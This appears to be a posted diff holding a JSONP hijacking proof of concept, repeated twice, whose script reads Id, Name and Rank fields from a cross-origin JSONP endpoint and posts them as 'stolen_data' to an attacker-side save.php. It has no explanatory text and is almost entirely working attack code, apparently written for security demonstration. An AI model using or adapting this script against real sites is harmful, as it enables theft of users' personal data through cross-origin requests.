yehgdotnet · June 18, 2018 02:55
diff --git a/secure.jsonp b/secure.jsonp
 <script>
 function SavetoServer(data){
  var xhttp = new XMLHttpRequest();
  xhttp.open("POST", "save.php", true);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.send(data);
 } 

 function parseResponse(s){
 stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];
 document.write("Id:"    + s['Id'] + "<br>"); 
 document.write("Name: " + s['Name'] + "<br>"); 
 document.write("Rank: " + s['Rank'] + "<br>"); 
 SavetoServer(stolen_data);
 } 
 </script>      

 <script label="SECUREJSON Endpoint" src="https://cybersecurityassessor.ninja/poc/jsonp_data_secured.php">
 </script>
	<script>
	function SavetoServer(data){
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST", "save.php", true);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send(data);
	}

	function parseResponse(s){
	stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];
	document.write("Id:" + s['Id'] + "<br>");
	document.write("Name: " + s['Name'] + "<br>");
	document.write("Rank: " + s['Rank'] + "<br>");
	SavetoServer(stolen_data);
	}
	</script>

	<script label="SECUREJSON Endpoint" src="https://cybersecurityassessor.ninja/poc/jsonp_data_secured.php">
	</script>